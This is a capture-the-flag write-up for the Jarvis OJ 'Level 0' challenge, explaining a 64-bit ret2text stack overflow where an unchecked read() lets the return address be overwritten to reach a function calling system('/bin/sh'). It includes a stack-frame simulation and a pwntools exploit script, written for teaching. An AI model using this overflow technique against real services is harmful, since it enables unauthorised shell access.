Title source: Jarvis OJ
Title: Level 0
Title Description:
Level 0 is a stack overflow of the ret2text kind ("return to text"): the program contains a dangerous function through which the saved return address can be overwritten, and the overflow is used to redirect execution to a function that already exists in the program's own .text segment.
Basic process (depends on personal habits):
Run the program and look at its flow
file: check the file type and architecture
checksec: check the binary's protection mechanisms
IDA: decompile
Analyze the suspected vulnerability, decide on an attack approach, write the PoC
View the flow of the program
Memory layout differs between systems. The registers involved in stack operations are mainly EBP and ESP (RBP and RSP on 64-bit), which behave like pointers. ESP always points to the top of the stack: PUSH first subtracts 4 from ESP (8 from RSP on 64-bit) and then copies the data to the location ESP points to; POP first copies the data ESP points to into the destination register or memory and then adds 4 (8) to ESP. The stack grows from high addresses towards low addresses, so parameters and local variables are always accessed as EBP plus or minus a fixed offset.
32-bit: each stack slot is 4 bytes
64-bit: each stack slot is 8 bytes
For a stack overflow you usually need to determine the padding length: the distance between the buffer you write into and the address you want to overwrite. That comes from the buffer's offset from the frame base (ebp/rbp) plus the slots that sit between it and the target (the saved frame pointer, then the return address), using the slot sizes above. With that you overwrite the variable or address that the situation calls for.
From file I know it is a 64-bit binary.
View document protection mechanisms
NX: non-executable stack
PIE: position-independent executable
Canary: stack-overflow sentinel
Symbols: whether symbol information is present
RELRO: relocation read-only; with Full RELRO the GOT (global offset table, through which dynamically linked functions are resolved) is filled in at load time and then made read-only, so it cannot be overwritten
Only NX is enabled; the stack canary is not. A canary places a cookie value on the stack between the local variables and the saved return address when a function is entered and verifies it before the function returns; if the cookie has been changed the program aborts. A linear overflow from the buffer necessarily overwrites the cookie, so with a canary in place the value would have to be leaked first. PIE means a position-independent executable: each time the program is loaded, the base addresses of the text, data, bss and other segments change, which makes it hard for an attacker to know which address to return to. PIE is off here, so the addresses of the program's own functions are fixed and ret2text works directly.
Opening it in IDA and going straight to main: it prints "Hello World" and then calls another function and returns its result.
In that function the buffer is at rbp-80h, i.e. 0x80 bytes below rbp.
rbp
Base pointer register: points to the base of the current (topmost) stack frame and is used for stack addressing.
It anchors the frame: locals and arguments are addressed by fixed offsets from it, and the copy saved in the prologue lets the caller's frame be restored on return.
The read call does no length check: it copies up to the count it is given into the buffer regardless of the buffer's size, so it overflows. Unlike gets, read does not stop at a newline, so the address bytes can contain any value.
The file is 64-bit; the buffer is 0x80 from rbp (and 0x8b from rsp in the disassembly).
On 64-bit each slot is 8 bytes, so the saved rbp occupies 8 bytes:
push rbp: rsp -= 8, the value is stored at [rsp] (4 bytes with push ebp on 32-bit)
pop rbp: the value at [rsp] is loaded, then rsp += 8
The corresponding stack structure is then as follows (diagram taken from the internet, not reproduced here).
IDA also shows a function callsystem that calls system("/bin/sh"), i.e. it spawns a shell.
The saved return address is overwritten with the address of callsystem so that the vulnerable function's ret lands there. The note here gives 0x400684, while the payload uses 0x400596; whichever address IDA shows for callsystem in the binary is the one to use, so verify it before sending.
payload = b'a'*0x80 + b'b'*8 + p64(0x400596)   # 0x80 bytes fill the buffer, 8 bytes overwrite the saved rbp, then the return address
The stack at this point: [rbp-0x80, rbp) 0x80 bytes of 'a' (buffer) | [rbp, rbp+8) 8 bytes of 'b' (saved rbp) | [rbp+8, rbp+16) p64(0x400596) (return address)
When sending this string to the program, remember that every value in memory is stored as bytes, usually little-endian.
What little-endian storage is:
In little-endian storage the least significant byte of a value is stored at the lowest address and the most significant byte at the highest.
For example, the 32-bit value 0x0804843B is laid out in memory as \x3b\x84\x04\x08, and the 64-bit value 0x400596 as \x96\x05\x40\x00\x00\x00\x00\x00.
pwntools does this conversion for us: p64 packs an integer into its 8-byte little-endian representation (p32 for 4 bytes), so the address goes over the wire as raw bytes rather than as text.
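As an added example (not the writeup's own code, which talks to the remote service with pwntools), the following stand-alone Python models the frame layout described above, from the caller's call through push rbp, the unchecked read() into rbp-0x80, and leave; ret, and writes the little-endian packing out by hand so the byte order is visible. 0x400596 and the 0x80 buffer size are taken from the writeup; the caller's return address and frame pointer (CALLER_RET, CALLER_RBP) are made-up placeholders.

```python
# Added example: model of the Level 0 stack frame and payload, without pwntools.
# CALLER_RET / CALLER_RBP are placeholders, not addresses from the binary.

WORD = 8                      # x86-64: every stack slot (saved rbp, return address) is 8 bytes
BUF_SIZE = 0x80               # the buffer sits at rbp-0x80, as IDA shows
CALLSYSTEM = 0x400596         # address of callsystem used in the writeup's payload
CALLER_RET = 0x401234         # placeholder: where the caller would normally resume
CALLER_RBP = 0x7ffffffde000   # placeholder: the caller's frame pointer


def p64(value):
    """Pack an integer as 8 little-endian bytes: least significant byte first."""
    return bytes((value >> (8 * i)) & 0xff for i in range(WORD))


def u64(data):
    """Inverse of p64: the byte at offset i contributes data[i] << 8*i."""
    return sum(b << (8 * i) for i, b in enumerate(data[:WORD]))


def offset_to_return_address(buf_offset_from_rbp, word=WORD):
    """Padding before the return address: the buffer's distance to rbp
    plus one slot for the saved rbp that sits at [rbp]."""
    return buf_offset_from_rbp + word


def bad_bytes(data, badchars):
    """Byte values in data that the program's input routine would mangle.
    read() copies raw bytes, so nothing is bad here; gets() stops at 0x0a
    and strcpy() at 0x00, which would truncate p64(0x400596)."""
    return sorted(set(b for b in data if b in badchars))


class Stack:
    """A byte array with rsp/rbp; push and pop follow the x86-64 rules exactly."""

    def __init__(self, size=0x1000, base=0x7ffffff00000):
        self.mem = bytearray(size)
        self.base = base
        self.rsp = base + size      # empty stack: rsp at the top of the region
        self.rbp = 0

    def write(self, addr, data):
        i = addr - self.base
        if i < 0 or i + len(data) > len(self.mem):
            raise ValueError("write outside the modelled stack")
        self.mem[i:i + len(data)] = data

    def read(self, addr, n):
        i = addr - self.base
        return bytes(self.mem[i:i + n])

    def push(self, value):
        self.rsp -= WORD                   # rsp moves down one slot first...
        self.write(self.rsp, p64(value))   # ...then the value is stored at [rsp]

    def pop(self):
        value = u64(self.read(self.rsp, WORD))   # load from [rsp] first...
        self.rsp += WORD                         # ...then rsp moves up one slot
        return value


def run_vulnerable_function(payload, buf_size=BUF_SIZE):
    """Simulate call -> push rbp; mov rbp, rsp; sub rsp, buf_size -> read(0, buf, n)
    -> leave; ret.  Returns (rip after ret, rbp after ret)."""
    st = Stack()
    st.rbp = CALLER_RBP
    st.push(CALLER_RET)          # call: the return address is pushed
    st.push(st.rbp)              # push rbp: the caller's frame pointer is saved at [rbp]
    st.rbp = st.rsp              # mov rbp, rsp
    st.rsp -= buf_size           # sub rsp, 0x80: room for the local buffer
    buf = st.rbp - buf_size      # the buffer is at rbp-0x80
    st.write(buf, payload)       # read() with no length check: bytes beyond buf_size
                                 # land on the saved rbp and then the return address
    st.rsp = st.rbp              # leave = mov rsp, rbp; pop rbp
    st.rbp = st.pop()
    rip = st.pop()               # ret pops the (now attacker-controlled) return address
    return rip, st.rbp


def build_payload(target=CALLSYSTEM, buf_size=BUF_SIZE):
    """Fill the buffer, overwrite the saved rbp with a marker, then the return address."""
    return b'a' * buf_size + b'b' * WORD + p64(target)


if __name__ == "__main__":
    payload = build_payload()
    print("return address offset: %#x" % offset_to_return_address(BUF_SIZE))
    print("p64(0x400596) =", p64(CALLSYSTEM))
    rip, rbp = run_vulnerable_function(payload)
    print("rip after ret: %#x, rbp after ret: %#x" % (rip, rbp))
```

Running it shows rip ending up at 0x400596 and rbp at 0x6262626262626262 (the eight 'b' bytes read back little-endian); sending only 0x80 bytes leaves both the saved rbp and the return address untouched. The bad_bytes check is not needed for read(), but it is the first thing to run when the input instead passes through gets(), scanf("%s") or strcpy(), since p64(0x400596) is mostly NUL bytes.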
from pwn import *

r = remote('', 9881)   # host omitted on the original page

# buf (0x80 bytes) | saved rbp (8 bytes) | return address -> callsystem
payload = b'a' * 0x80 + b'b' * 8 + p64(0x400596)
r.send(payload)
r.interactive()